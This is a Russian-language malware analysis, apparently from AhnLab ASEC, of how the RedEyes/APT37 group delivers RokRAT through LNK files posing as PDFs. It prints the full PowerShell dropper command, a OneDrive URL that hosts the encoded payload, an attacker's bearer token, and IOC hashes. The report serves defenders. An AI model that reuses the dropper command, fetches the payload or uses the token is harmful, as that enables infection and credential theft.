Центр экстренного реагирования AhnLab Security (ASEC) подтвердил, что угрожающая группа RedEyes (также известная как APT37, ScarCruft), которая в прошлом месяце распространила вредоносное ПО CHM, замаскированное под письмо безопасности от корейской финансовой компании, также недавно распространила вредоносное ПО RokRAT через LNK-файлы.
RokRAT Malware
RokRAT - это вредоносная программа, способная собирать учетные данные пользователя и загружать дополнительные вредоносные программы. Вредоносная программа распространялась через файлы HWP и Word. Обнаруженные на этот раз LNK-файлы содержат команды PowerShell, которые могут выполнять вредоносное поведение путем создания и выполнения файла сценария вместе с обычным файлом в папке temp.
Файл "230407Infosheet.lnk" замаскирован под значок PDF и содержит вредоносную команду PowerShell.
LNK-файл содержит не только команду PowerShell, но и данные обычного PDF-файла вместе с кодами вредоносных сценариев. Кроме того, в нем присутствуют фиктивные байты, начинающиеся с 0x89D9A и заканчивающиеся 0x141702A.
Команда PowerShell, которая выполняется через cmd.exe при выполнении LNK-файла, выглядит следующим образом:
/c powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') { $dirPath = '%temp%' }; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x00014A0DC4} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00561396 -ReadCount 00561396; $pdfPath = '%temp%\230407정보지. pdf'; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 002474)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00564634 -ReadCount 00564634; $exePath = '%temp%\230412. bat'; sc $exePath ([byte[]]($exeFile ^| select -Skip 00561396)) -Encoding Byte; ^& $exePath;LNK файл считывается до 0x890F4, сохраняется и выполняется с именем "230407Infosheet.pdf" в папке Temp, исключая первые 0x9AA. Затем считывается до 0x89D9A файл LNK, сохраняется и выполняется в папке Temp с именем "230412.bat" после исключения 0x890F4, который является байтом, где существуют данные PDF.
Угрожающий агент выполняет обычный PDF-файл, чтобы поведение выглядело нормальным, прежде чем реализовать свое вредоносное поведение через файл сценария.
Файл сценария, выполняемый в то же время, содержит следующую команду PowerShell, которая выполняет вредоносные команды, существующие в виде HEX-значений.
Последняя выполняемая команда PowerShell загружает закодированные данные из hxxps://api.onedrive[.]com/v1.0/shares/u! aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZElLSjE/root/content, декодирует его и внедряет в процесс PowerShell для выполнения вредоносного поведения.
Инжектированные данные представляют собой вредоносную программу RokRAT, которая способна собирать учетные данные пользователя и загружать дополнительное вредоносное ПО. Собранная информация отправляется на облачный сервер угрожающего агента с помощью облачных сервисов, таких как pcloud и yandex. UserAgent в заголовке запроса маскируется под Googlebot. Токен сертификата, используемый для отправки файлов, выглядит следующим образом:
Authorization: Bearer RSbj7Zk5IYK5ThSbQZH4YBo7ZxiPOCH94RBbFuU9c04XXVJg7xbvXIndicators of Compromise
URLs
- https://api.onedrive.com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZElLSjE/root/content
- https://api.onedrive.com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBdTJteTF4aDZ0OFhnUjJNem1zOG5oUndvLTZCP2U9akhIQzZ5/root/content
MD5
- 0f5eeb23d701a2b342fc15aa90d97ae0
- 461ce7d6c6062d1ae33895d1f44d98fb
- 657fd7317ccde5a0e0c182a626951a9f
- 8fef5eb77e0a9ef2f97591d4d150a363
- aa8ba9a029fa98b868be66b7d46e927b
- be32725e676d49eaa11ff51c61f18907